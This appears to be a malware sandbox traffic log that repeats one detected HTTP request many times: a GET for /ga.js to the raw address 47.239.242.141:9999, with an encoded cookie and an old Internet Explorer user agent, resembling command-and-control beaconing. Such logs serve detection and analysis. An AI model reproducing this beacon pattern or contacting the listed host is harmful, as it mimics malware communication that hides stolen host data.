Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
